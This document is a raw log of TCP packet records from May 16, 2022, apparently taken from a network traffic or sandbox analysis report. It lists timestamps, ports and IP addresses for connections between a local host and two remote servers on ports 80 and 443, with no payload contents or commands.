May 16, 2022 10:29:38.015166998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015182972 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015198946 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015214920 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015222073 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015230894 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015245914 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015261889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015269995 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015284061 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015305996 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015317917 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015328884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015348911 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015362024 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015368938 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015389919 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015396118 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015408039 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015424013 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015439034 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015444994 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015458107 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015472889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015489101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015497923 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015503883 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015520096 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015536070 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015543938 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015552044 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015568018 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015583992 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015585899 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015599966 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015615940 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015630960 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015633106 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015646935 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015664101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015678883 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015691996 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015695095 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015717983 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015733957 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015748978 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015749931 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015788078 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015790939 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015810966 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015819073 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015882969 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015902996 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015921116 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015937090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015953064 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015958071 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015970945 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015988111 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016004086 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016016006 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016021013 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016038895 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016055107 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016069889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016084909 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016098022 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016103983 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016115904 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016130924 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016144991 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016146898 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016163111 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016179085 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016190052 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016194105 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016211987 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016228914 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016233921 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016244888 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016261101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016268969 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016278982 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016294956 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016299963 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016310930 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016328096 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016340971 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016344070 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016361952 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016377926 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016387939 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016393900 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016411066 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016426086 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016426086 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016443968 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016459942 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016488075 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016510963 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016529083 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016540051 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016545057 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016561985 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016572952 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016578913 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016596079 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016612053 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016623020 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016628981 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016644001 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016660929 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016660929 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016676903 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016694069 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016701937 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016710997 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016726017 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016741991 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016752005 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016757965 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016773939 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016789913 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016804934 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016814947 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016820908 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016838074 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016851902 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016868114 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016880035 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016885042 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016901970 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016912937 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016918898 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016933918 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016948938 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.016954899 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.016988039 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.017014027 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.017786026 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.020981073 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.025962114 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.026014090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.026031971 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.026082993 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.026122093 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.027944088 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.027961969 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028044939 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.028126955 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028145075 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028162003 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028177023 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028186083 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.028193951 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028209925 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028224945 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028240919 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028253078 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.028258085 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028275967 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.028316975 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.028357029 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031027079 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031052113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031068087 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031084061 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031099081 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031115055 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031131029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031141043 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031147957 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031166077 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031182051 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031197071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031208992 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031214952 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031229973 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031245947 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031250954 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031263113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031279087 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031292915 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031294107 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031311989 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031327009 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031333923 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031343937 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031359911 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031373024 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031375885 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031393051 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031409025 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031411886 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031425953 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031441927 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031449080 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031459093 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031474113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031490088 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031491041 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031506062 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031521082 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031523943 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031538010 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031553984 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031563044 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031569958 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031593084 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031601906 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031609058 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031625032 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031635046 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031640053 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031656981 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031670094 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031672001 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031687975 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031703949 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031711102 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031721115 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031738043 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031752110 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031759024 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031769037 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031785011 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031790972 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031800985 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031816959 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031831026 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031838894 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031847954 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031863928 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031873941 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031878948 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031894922 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031900883 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031913042 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031928062 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031933069 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031944036 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031960011 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.031961918 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.031992912 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.032021999 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.036834955 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.036871910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.036889076 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.036900043 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.036916971 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.036933899 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.036950111 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.036966085 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.036981106 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.036995888 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037012100 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037026882 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037044048 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037045002 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.037060976 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037075996 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037094116 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037110090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037125111 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037134886 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.037142038 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037158012 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037173033 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037178993 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.037189007 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037204981 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037233114 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037235022 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.037254095 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037272930 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.037275076 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.037306070 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.037348032 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.038033009 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.038058043 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.038105011 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.038136959 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.047426939 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.047686100 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.052824020 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.052941084 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.923477888 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.923660040 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.944045067 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.944329977 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.944338083 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.944401026 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.964665890 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.964692116 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.964828968 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.964962006 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.965030909 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.965063095 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.965106964 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.985222101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.985275030 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.985305071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.985330105 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.985347986 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.985419035 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.985526085 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.985542059 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:51.985558987 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.985716105 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:51.985743999 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.005686045 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.005784988 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.005871058 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.005883932 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.005942106 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.005954981 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.006062984 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.006134033 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.006181955 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.006302118 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.007556915 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.337434053 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:52.338141918 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:52.513442993 CEST	49771	80	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.530715942 CEST	80	49771	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.531352997 CEST	49771	80	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.531881094 CEST	49771	80	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.550935030 CEST	80	49771	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.553423882 CEST	49771	80	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.562215090 CEST	49772	443	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.562280893 CEST	443	49772	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.562484026 CEST	49772	443	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.563052893 CEST	49772	443	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.563097954 CEST	443	49772	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.609961033 CEST	443	49772	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.610141039 CEST	49772	443	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.620732069 CEST	49772	443	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.620764971 CEST	443	49772	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.621185064 CEST	443	49772	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.621299982 CEST	49772	443	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.621932983 CEST	49772	443	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.664505005 CEST	443	49772	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.797029018 CEST	443	49772	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.797166109 CEST	443	49772	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.797241926 CEST	443	49772	140.82.121.3	192.168.2.5
May 16, 2022 10:29:52.797331095 CEST	49772	443	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.797367096 CEST	49772	443	192.168.2.5	140.82.121.3
May 16, 2022 10:29:52.809859037 CEST	49772	443	192.168.2.5	140.82.121.3
